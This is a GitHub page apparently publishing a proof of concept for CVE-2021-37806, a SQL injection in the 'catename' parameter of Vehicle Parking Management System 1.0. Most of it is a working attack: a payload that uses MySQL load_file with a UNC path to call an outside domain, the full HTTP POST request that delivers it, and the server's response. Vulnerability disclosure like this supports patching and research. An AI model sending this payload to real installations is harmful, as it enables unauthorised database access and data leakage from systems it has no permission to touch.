Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-mitre/CVE-2021-37806/
CVE-mitre/CVE-2021-37806/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.

CVE-2021-37806

Vendor

Software

On working

Description:

The catename parameter from Vehicle Parking Management System affected version 1.0 app appears to be vulnerable to SQL injection attacks - type time-based blind. The payload '+(select load_file('\\ma0xscj8wyb2gd8sai9pcyvl7cd51xvlmoagx6lv.nu11secur1ty.net\hgt'))+' was submitted in the catename parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.

MySQL Request

POST /Vehicle%20parking%20management%20System%20project/vpms/add-category.php HTTP/1.1
Host: 192.168.1.2
Origin: http://192.168.1.2
Cookie: PHPSESSID=1earei5r7uisqidmakmk0es5ju
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.2/Vehicle%20parking%20management%20System%20project/vpms/add-category.php
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH7En2PBJTRM5v1Yq
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 241

------WebKitFormBoundaryH7En2PBJTRM5v1Yq
Content-Disposition: form-data; name="catename"

277509'+(select load_file('\\\\ma0xscj8wyb2gd8sai9pcyvl7cd51xvlmoagx6lv.nu11secur1ty.net\\hgt'))+'
------WebKitFormBoundaryH7En2PBJTRM5v1Yq
Content-Disposition: form-data; name="submit"

..e
------WebKitFormBoundaryH7En2PBJTRM5v1Yq--

MySQL Response

HTTP/1.1 200 OK
Date: Sat, 30 Oct 2021 20:06:14 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9928

<!doctype html>
<html class="no-js" lang="">
<head>

<title>VPMS - Add Category</title>


<link rel="apple-touch-icon" href="https://i.imgur.com/QRAUqs9.png">
<link rel="sho
...[SNIP]...

Reproduce:

href

Proof:

href